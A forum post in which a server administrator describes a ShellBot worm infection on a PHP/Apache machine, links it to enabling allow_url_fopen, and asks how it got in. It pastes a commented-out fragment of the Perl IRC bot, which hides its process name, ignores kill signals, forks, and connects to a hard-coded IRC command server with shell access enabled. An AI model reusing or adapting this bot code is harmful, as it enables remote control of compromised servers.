One of my machines was compromised by the shellbot worm. I don't have phpbb installed but I do have php running with apache2. I saw that a perl script running spanned by apache was eating up all of my CPU. I tried killing the process, it had been running for 13 hours. I wasn't able to kill it, so I thought something was strange. I grepped for "apache" in the temp directory and found this file sess_3539283e27d73cae29fe2b80f9293f60. I vimmed the file and found the text shellbot in it. I googled shellbot and found that it goes after php and phpbb vulnerabilities. Since I don't have phpbb, I reasoned that php was the problem.
I thought about what I could have done to compromise security. 20 hours ago I changed a setting in /etc/apache2/conf/php.ini. I changed allow_url_fopen = Off to on
Code: Select all
Whether to allow the treatment of URLs (like http:// or ftp://) as files.
; allow_url_fopen = On
; Closed for security - <robbat2@gentoo.org>
#allow_url_fopen = Off
allow_url_fopen = Off
I commented out the worm code and changed the allow_url_fopen to off and rebooted the machine. Everything seems to be running fine but I know I have to reformat the hard disk and start over again. I've got a lot of web sites and mail accounts on this machine so it's going to be a major pain in the butt. But that's the way it goes. Live and learn. : (
Below is a snippet of the worm.
Code: Select all
#hellBOT - FBI TEAM Corporation
##
## ShellBOT - FBI TEAM Corporation
##
## 0ldW0lf - effbeeye81@aol.com
## - www.security.cnc.net
##
##
##
################# CONFIGURACAO #################################################################
#my $processo = '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo que vai aparece no ps #
##----------------------------------------------################################################
#my $linas_max='8'; # Evita o flood :) depois de X linhas #
##----------------------------------------------################################################
#my $sleep='4'; # ele dorme X segundos #
###################### IRC #####################################################################
#my @adms=("zamel00","buju"); # Nick do administrador
##
##----------------------------------------------################################################
#my @canais=("#vvvvv 214112"); # Caso haja senha ("#canal :senha") #
##----------------------------------------------################################################
#my $nick='fbigov'; # Nick do bot. Caso esteja em uso vai aparecer #
# # aparecer com numero radonamico no final #
##----------------------------------------------################################################
#my $ircname = 'fbigov'; # User ID
##
##----------------------------------------------################################################
#chop (my $realname = `uname -a`); # Full Name #
##----------------------------------------------################################################
#$servidor='61.77.30.70' unless $servidor; # Servidor de irc que vai ser usado #
# # caso não seja especificado no argumento #
##----------------------------------------------################################################
#my $porta='6667'; # Porta do servidor de irc #
################# ACESSO A SHELL ###############################################################
#my $secv = 1; # 1/0 pra habilita/desabilita acesso a shell #
################################################################################################
#
#my $VERSAO = '0.2';
#
#$SIG{'INT'} = 'IGNORE';
#$SIG{'HUP'} = 'IGNORE';
#$SIG{'TERM'} = 'IGNORE';
#$SIG{'CHLD'} = 'IGNORE';
#$SIG{'PS'} = 'IGNORE';
#
#use IO::Socket;
#use Socket;
#use IO::Select;
#chdir("/");
#$servidor="$ARGV[0]" if $ARGV[0];
#$0="$processo"."\0"x16;;
#my $pid=fork;
#exit if $pid;
#die "Problema com o fork: $!" unless defined($pid);
#
#
#
#my $dcc_sel = new IO::Select->new();
#
##############################
## B0tchZ na veia ehehe :P #
##############################
#
#$sel_cliente = IO::Select->new();
#sub sendraw {
# if ($#_ == '1') {
# my $socket = $_[0];
# print $socket "$_[1]\n";
# } else {
# print $IRC_cur_socket "$_[0]\n";
# }
#}
#
#
#sub conectar {
# my $meunick = $_[0];
# my $servidor_con = $_[1];
# my $porta_con = $_[2];
#
# my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
# if (defined($IRC_socket)) {
# $IRC_cur_socket = $IRC_socket;
#
# $IRC_socket->autoflush(1);
# $sel_cliente->add($IRC_socket);
#
# $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
# $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
# $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
# $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
# nick("$meunick");
# sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
# sleep 1;
# }
#
#}
#my $line_temp;
#while( 1 ) {
# while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
# delete($irc_servers{''}) if (defined($irc_servers{''}));
# &DCC::connections;
# my @ready = $sel_cliente->can_read(0);
# next unless(@ready);
# foreach $fh (@ready) {
# $IRC_cur_socket = $fh;
# $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
# $nread = sysread($fh, $msg, 4096);
# if ($nread == 0) {
# $sel_cliente->remove($fh);
snipped the remaining 90%....
If anybody knows exactly what allowed this worm to get through please let me know, so I can guard against it in the future. I'm guessing that the file write setting I discussed above was the problem but I'm not sure.
Cheers,
